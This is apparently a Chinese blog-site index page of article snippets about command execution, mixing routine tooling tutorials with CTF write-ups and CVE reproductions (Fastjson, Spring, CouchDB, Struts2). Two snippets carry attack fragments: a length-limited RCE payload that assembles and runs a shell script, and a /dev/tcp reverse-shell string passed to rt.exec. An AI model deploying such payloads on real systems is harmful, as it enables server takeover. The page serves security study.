CTFSHOW-命令执行

Linux安装python环境

developenssl-develncurses-develsqlite-develreadline-develtk-develgccmakezlibzlib-devellibffi-devel-y第二步上面的命令执行完成后打开官网找到
♛暮辞·2023-12-02 00:41

NSSCTF第14页(2)

提示说看看反序列化字符串逃逸PHP反序列化字符串逃逸_php反序列化逃逸-CSDN博客php反序列化字符逃逸_php反序列化逃逸_Leekos的博客-CSDN博客buuctf刷题9(反序列化逃逸&shtml-SSI远程命令执行
呕...·2023-12-01 21:54

【Web】NewStarCTF Week3 个人复现

file=phpinfo提示查下register_argc_argv发现为onLFI包含pearcmd命令执行学习pearcmd.php文件包含妙用?
Z3r4y·2023-12-01 17:55

CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总

七字符rce源码';echoshell_exec($_GET[1]);}else{exit('toolong');}?>#写入语句1.phppayload:>hp>1.p\\>d\>\\>\-\\>e64\\>bas\\>7\|\\>XSk\\>Fsx\\>dFV\\>kX0\\>bCg\\>XZh\\>AgZ\\>waH\\>PD9\\>o\\\>ech\\ls-t>0sh0脚本代码:#!/us
OceanSec·2023-12-01 17:53

【Web】UUCTF 2022 新生赛 个人复现

①websign②ez_rce③ez_upload④ez_unser⑤ezsql⑥ezpop⑦funmd5⑧phonecode⑨ezrce①websign右键打不开,直接抓包发包看源码②ez_rce“反引号”在PHP中会被当作SHELL命令执行
Z3r4y·2023-12-01 16:22

Redis7--基础篇4(Redis事务)

Redis事务VS数据库事务––单独的隔离操作Redis的事务仅仅是保证事务里的操作会被连续独占的执行,redis命令执行是单线程架构,在执行完事务内所有指令前是不可能再去同时执行其他客户端的请求的没有隔离级别
UntifA·2023-12-01 16:42

docker swarm的使用以及实现负载均衡

root@manager43~]#dockerswarminit--advertise-addr192.168.31.43查看集群的相关信息[root@manager43~]#dockerinfo上面的命令执行后找到
大笑。·2023-12-01 11:10

问题记录-maven依赖升级或替换(简单版)

1找到高危漏洞的包如果装了mavenhelper插件则可以在下面查看当前模块依赖包2使用maven命令执行下面这个命令,会将当前项目的信息打印出来,那个jar依赖了什么其它的jar可以看的非常的清楚。
njnu@liyong·2023-12-01 11:57

Panalog 日志审计系统 前台RCE漏洞复现

0x02漏洞概述Panalog日志审计系统sy_query.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。
OidBoy_G·2023-12-01 11:06

Go 学习笔记(37)— 标准命令行工具(go build 跨平台编译、交叉编译、go clean、go run、go fmt、go install、go get、go vet)

命令源码文件会被编译成可执行文件,并存放到命令执行的目录或指定目录下。而库源码文件被编译后,则不会在非临时目录中留下任何文件。clean用于清除因执行其他go命令而遗留下来的临时目录和文件。
wohu007·2023-12-01 10:26

【网络安全】meterpreter攻击实战

远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统。
茗樱.Stella·2023-12-01 06:45

【学了就忘】Git操作 — 62.rebase命令执行原理

如图所示,master和dev分支都以提交节点A为基准点:如果dev分支想要变换A这个基准点,那么:第一步:切换到dev分支上;(想要变基哪个分支,就切换到哪个分支上执行gitrebase命令)第二步:执行gitrebasemaster;(master就代表变基的目标分支)说明:上述命令中rebase参数后面指定的分支,就是变更后的基准点,如上例子中的master分支:如果是分支,如master,
繁华似锦Fighting·2023-12-01 03:43

Spring Framework远程代码执行漏洞 CVE-2022-22965 漏洞复现

SpringFramework远程代码执行漏洞CVE-2022-22965漏洞复现和相关利用工具名称:SpringFramework远程命令执行漏洞描述:Springcore是Spring系列产品中用来负责发现
梧六柒·2023-12-01 02:22

Couchdb 命令执行漏洞复现 (CVE-2017-12636)

Couchdb命令执行漏洞复现(CVE-2017-12636)1、下载couchdb.py2、修改目标和反弹地址3、Python3调用执行即可couchdb.py文件下载地址:https://github.com
梧六柒·2023-12-01 02:51

python docker api_Docker的Python库API

您可以使用以下pip命令执行
千层猫·2023-11-30 20:35

vulhub struts2 s2-001漏洞复现

例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行
YiHua_yiye·2023-11-30 12:52

Linux - You are in emergency mode. After logging in, type “journalctl -xb“ to view

“systemctlreboot”toreboot,“systemctldefault”or“exit”tobootintodefaultmode.原因分析这是由于/etc/fstab文件内的磁盘挂载命令执行失败导致的系统开机启动
清风er·2023-11-30 12:01

Redis进阶(事务、锁、删除策略、逐出算法)——redis小白进阶教程(理论)

一、Redis事务管理简介:redis事务作为一个命令执行的队列,将一系列的预处理的命令包装成为一个整体,当执行时按照添加顺序依次执行,中间不会被打断或干扰。
sirwsl·2023-11-30 12:58

CVE-2016-3714 - ImageMagick 命令执行分析

phith0n·2016/05/0518:12ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。国外的安全人员为此新建了一个网站:https://imagetragick.com/,不得不说,有些外国人蛮会玩的。相对于之前的数
weixin_33882452·2023-11-30 10:19

重要端口及服务速查

/openssh漏洞23telnet远程连接爆破/嗅探/弱口令25smtp邮件服务邮件伪造53dns域名解析系统域传送/劫持/缓存投毒/欺骗67/68dhcp服务劫持/欺骗81IPCam登陆绕过/远程命令执行
阿凯6666·2023-11-30 09:07

Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具

Springboot命令执行(CVE-2022-22947)漏洞复现和相关利用工具名称:spring命令执行(CVE-2022-22947)描述:SpringCloudGateway是Spring中的一个
梧六柒·2023-11-30 07:45

Java多线程编程核心技术(第二版)

单任务是一个命令执行完才能执行下一个任务2.多任务是同一时间可以执行多个任务任务之间可以来回切换,系统和CPU的运行效率大大提升3.多线程也就是在使用异步(多线程是异步的)4.实现多线程有两种方式:继
tlfclwx·2023-11-29 23:53

杂记 | 使用Docker安装并配置MongoDB以支持事务(单副本,并解决了证书文件错误的问题)

00安装前的准备在开始之前,确保已经安装了Docker,本文基于DockerCompose进行示范,没有装DockerCompose也可将其中的docker-compose命令转换为dockerrun命令执行
程序猿林仔·2023-11-29 14:00

php ld preload,利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令

0x00前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步
林勇脊柱软伤·2023-11-29 10:24

从一道ctf题学习LD_PRELOAD绕过函数禁用

[极客大挑战2019]RCEME打开题目,就是简单的无字母数字的命令执行代码:40){die("ThisistooLong.");}if(preg_match("/[A
XiLitter·2023-11-29 10:50

python安装whl文件

1.在cmd里切换目录cd到python的Scripts或者anaconda的Scripts文件夹下2.命令执行如下pipinstallxxxxx.whl
曦宝·2023-11-29 09:07

linux管道重定向

标准输入1,标准输出2,标准错误3+,进程在执行过程中打开的其他文件&:表示正确错误混合输出输出重定向:>> 覆盖>> 追加正确输出:1>1>>等价于>>> //默认是正确输出错误输出:2>2>>​&&前面命令执行
丨析木丨·2023-11-29 07:33

jekins CVE-2018-1000861 漏洞复现

jekinsCVE-2018-1000861漏洞复现‍名称:jenkins命令执行(CVE-2018-1000861)描述:Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助
梧六柒·2023-11-29 03:54

fastjson 1.2.24 反序列化导致任意命令执行漏洞

漏洞描述fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。参考资料:浅谈FastjsonRCE漏洞的绕过史-FreeBuf网络安全行业门户http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A
blackK_YC·2023-11-29 03:52

Fastjson-1.2.47远程命令执行漏洞(标明坑位)

前言最近一直想复现这个漏洞,但是一直没时间,也没怎么在网上找到真的有用的文章,太多水文了,10篇文章有9篇都是一模一样的copy,还有一篇就只copy了一半,另一半就不搞了,真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的漏洞概述首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通
晚安這個未知的世界·2023-11-29 03:51

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson1.2.47RCE远程命令执行漏洞复现漏洞背景在2019年6月,fastjson被爆出在fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec
zyl404·2023-11-29 03:51

fastjson 1.2.24 反序列化 CVE-2017-18349 && Fastjson 1.2.47 远程命令执行漏洞

前言fastjson库是Java的一个json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象漏洞描述FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。环境准备靶场:Vulhub靶机:192.168.239.128Kali:1
哇·咔咔·2023-11-29 03:20

fastjson 1.2.47 远程命令执行漏洞

fastjson1.2.47远程命令执行漏洞文章目录fastjson1.2.47远程命令执行漏洞1在线漏洞解读:2环境搭建3影响版本:4漏洞复现4.1访问页面4.2bp抓包,修改参数5使用插件检测漏洞【
煜磊·2023-11-29 03:50

rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞 - 漏洞环境

Fastjson1.2.47远程命令执行漏洞Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。
weixin_39686192·2023-11-29 03:49

复现Fastjson 1.2.47 远程命令执行漏洞

复现Fastjson1.2.47远程命令执行漏洞漏洞原理:Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。
清风-77·2023-11-29 03:17

Fastjson 1.2.47 远程命令执行漏洞复现记录分享

Fastjson1.2.47远程命令执行漏洞复现前言环境要求环境准备靶机VPS漏洞复现前言Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。
YezIwnl·2023-11-29 03:46

Redis 命令处理过程

1例子setmyKeymyValueok上面是一个简单的Redis命令执行过程:用户借助Redis的
lcn29·2023-11-29 03:09

Fastjson 1.2.47 远程命令执行漏洞

漏洞描述Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。参考链接:FastJson远程代码执行漏洞分析报告-360CERT浅谈FastjsonRCE漏洞的绕过史-FreeBuf网络安
blackK_YC·2023-11-29 03:37

【Ansible 部署及使用】

是一种基于python开发的自动化运维工具,它只需要在服务端安装ansible,无需在每个客户端安装客户端程序,通过ssh的方式来进行客户端服务器的管理,基于模块来实现批量数据配置、批量设备部署以及批量命令执行
CodeStarNote·2023-11-28 20:36

MySQL数据库 编程入门

目录MySQL数据库数据类型MySQL数据库命令执行创建用户创建删除库创建删除表MySQL数据库数据类型MySQL数据库定义了多种数据类型,下面是一些常见的MySQL数据类型及其对应的C/C++类型:整数类型
貌美不及玲珑心,贤妻扶我青云志·2023-11-28 17:00

Component ‘MSCOMM32.0CX‘ or one of its dependencies not correctly registered: a file is missing or i

MSCOMM32.0CX文件缺失:去该链接找对应的缺失文件:找DLL网下载完把文件放入C:\Windows\SysWOW64\目录下以管理员身份执行CMD命令执行:Regsvr32C:\Windows\
且随疾风前行.·2023-11-28 16:10

buuctf-[BJDCTF2020]The mystery of ip(小宇特详解)

先看题目这里找不到线索就抓包找依次找flag.php,hint.php,index.php.2.这里重新抓包flag.php进行分析这里在重发器中加入client-ip:66尝试修改ip这里会发现能够修改flag中的ip这里想到命令执行尝试系统命令
小宇特详解·2023-11-28 15:04

[BJDCTF2020]The mystery of ip

考点:1、xff注入(X-Forwarded-For:)2、ssit模板注入题目在右上角菜单栏点击hint,f12寻找提示:看到ip其实我最开始想到的是命令执行漏洞(缺乏经验),经过尝试后发现不是,查阅大佬们的博客后发现
浑水摸鱼的咸鱼·2023-11-28 15:29

Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199

0x00简介nexus的全称是NexusRepositoryManager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、gitlfs、yum、go、apt等的私有仓
5f4120c4213b·2023-11-28 15:53

linux 系统下nginx安装方法【亲测有效】

使用YUM在联网状态下使用:第一步:yuminstallnginx安装命令执行完等待安装完成即可第二步:cd/etc/nginx安装完成后nginx的目录第三步:servicenginxstart启动nginx
KirioYoLo·2023-11-28 14:48

Shell 中 [-eq] [-ne] [-gt] [-lt] [-ge] [-le]

-eq//等于-ne//不等于-gt//大于(greater)-lt//小于(less)-ge//大于等于-le//小于等于在linux中命令执行状态:0为真,其他为假逻辑与:&&第一个条件为假时,第二条件不用再判断第一个条件为真时
星逻·2023-11-28 05:18

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

RedisLua沙盒绕过命令执行(CVE-2022-0543)漏洞复现Redis如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。
梧六柒·2023-11-28 04:47

Bypass open_basedir的方法

文章目录open_basedir概念绕过方法命令执行绕过symlink绕过(软连接)利用chdir()与ini_set()组合绕过例题[suctf2019]easywebopen_basedir概念open_basedir
_rev1ve·2023-11-28 02:53

Redis watch命令——监控事务

当Redis使用exec命令执行事务的时候,它首先会去比对被watch命令所监控的键值对,如果没有发生变化,那么它会执行事务队列中的命令,提交事务;如果发生变化,那么它不会执行
智慧浩海·2023-11-27 06:20

docker学习笔记

DockerDocker常用命令#查看下载的镜像dockerimages阿里云镜像加速run命令执行过程[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nY1Fydsb-1631803233563
kikilay·2023-11-27 02:02
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他